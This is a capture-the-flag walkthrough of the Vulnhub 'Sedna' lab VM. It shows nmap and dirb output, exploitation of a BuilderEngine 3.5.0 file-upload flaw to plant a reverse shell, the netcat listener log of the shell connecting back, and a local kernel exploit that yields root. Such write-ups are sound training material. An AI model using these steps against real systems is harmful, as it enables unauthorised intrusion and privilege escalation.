Vulnhub - hackfest2016: Sedna.

This vm was hard to find the first solution, but it was cool.

# Nmap 7.60 scan initiated Sat Feb 17 20:04:07 2018 as: nmap -sV -sC -p- -oN nmap.txt 10.0.2.20 Nmap scan report for 10.0.2.20 Host is up (0.00019s latency). Not shown: 65523 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA) | 2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA) | 256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA) |_ 256 ca:36:3c:32:e6:24:f9:b7:b4:d4:1d:fc:c0:da:10:96 (EdDSA) 53/tcp open domain ISC BIND 9.9.5-3-Ubuntu | dns-nsid: |_ bind.version: 9.9.5-3-Ubuntu 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_Hackers |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: SASL STLS TOP RESP-CODES CAPA AUTH-RESP-CODE UIDL PIPELINING | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | Not valid before: 2016-10-07T19:17:14 |_Not valid after: 2026-10-07T19:17:14 |_ssl-date: TLS randomness does not represent time 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100024 1 49650/tcp status |_ 100024 1 56501/udp status 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd (Ubuntu) |_imap-capabilities: listed Pre-login have LOGINDISABLEDA0001 OK STARTTLS IMAP4rev1 SASL-IR more capabilities LOGIN-REFERRALS post-login IDLE ID ENABLE LITERAL+ | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | Not valid before: 2016-10-07T19:17:14 |_Not valid after: 2026-10-07T19:17:14 |_ssl-date: TLS randomness does not represent time 445/tcp open netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP) 993/tcp open ssl/imap Dovecot imapd (Ubuntu) |_imap-capabilities: Pre-login listed have OK post-login IMAP4rev1 SASL-IR more capabilities LOGIN-REFERRALS AUTH=PLAINA0001 IDLE ID ENABLE LITERAL+ | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | Not valid before: 2016-10-07T19:17:14 |_Not valid after: 2026-10-07T19:17:14 |_ssl-date: TLS randomness does not represent time 995/tcp open ssl/pop3 Dovecot pop3d |_pop3-capabilities: SASL(PLAIN) USER TOP RESP-CODES CAPA AUTH-RESP-CODE UIDL PIPELINING | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | Not valid before: 2016-10-07T19:17:14 |_Not valid after: 2026-10-07T19:17:14 |_ssl-date: TLS randomness does not represent time 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 | http-methods: |_ Potentially risky methods: PUT DELETE |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat 49650/tcp open status 1 (RPC #100024) MAC Address: 08:00:27:25:82:1F (Oracle VirtualBox virtual NIC) Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 1s, deviation: 0s, median: 1s |_nbstat: NetBIOS name: SEDNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Unix (Samba 4.1.6-Ubuntu) | NetBIOS computer name: SEDNA\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2018-02-17T20:04:27-05:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2018-02-17 20:04:27 |_ start_date: 1600-12-31 19:03:58 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Feb 17 20:04:33 2018 -- 1 IP address (1 host up) scanned in 26.63 seconds

Now let's check dirb: dirb http://10.0.2.20/ ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sat Feb 17 20:09:04 2018 URL_BASE: http://10.0.2.20/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.0.2.20/ ---- ==> DIRECTORY: http://10.0.2.20/blocks/ ==> DIRECTORY: http://10.0.2.20/files/ + http://10.0.2.20/index.html (CODE:200|SIZE:101) ==> DIRECTORY: http://10.0.2.20/modules/ + http://10.0.2.20/robots.txt (CODE:200|SIZE:36) + http://10.0.2.20/server-status (CODE:403|SIZE:289) ==> DIRECTORY: http://10.0.2.20/system/ ==> DIRECTORY: http://10.0.2.20/themes/ ---> This is really important!!!!!!!! [...]
Let's visit themes:

BuildEngine is vulnerable, you can find that on exploitdb:
searchsploit BuilderEngine /usr/share/exploitdb/exploits/php/webapps/40390.php --- BuilderEngine 3.5.0 - Arbitrary File Upload
Change 40390.php that to fit your needs and upload your reverse-shell. Now,you're in. Run your favorite privilege escalation script. I tried some things - you can try many things, including DirtyCow.

You can download the final exploit here. nc -lvp 4444 listening on [any] 4444 ... 10.0.2.20: inverse host lookup failed: Unknown host connect to [10.0.2.21] from (UNKNOWN) [10.0.2.20] 37644 Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux 20:22:00 up 23 min, 0 users, load average: 0.00, 0.01, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ cd /var/www $ ls flag.txt html $ cat flag.txt bfbb7e6e6e88d9ae66848b9aeac6b289 $ gcc -static 36746.c 36746.c:17:3: warning: #warning this file must be compiled with -static [-Wcpp] # warning this file must be compiled with -static ^ $ ./a.out uid=0(root) gid=33(www-data) groups=0(root),33(www-data) whoami root cat /root/flag.txt a10828bee17db751de4b936614558305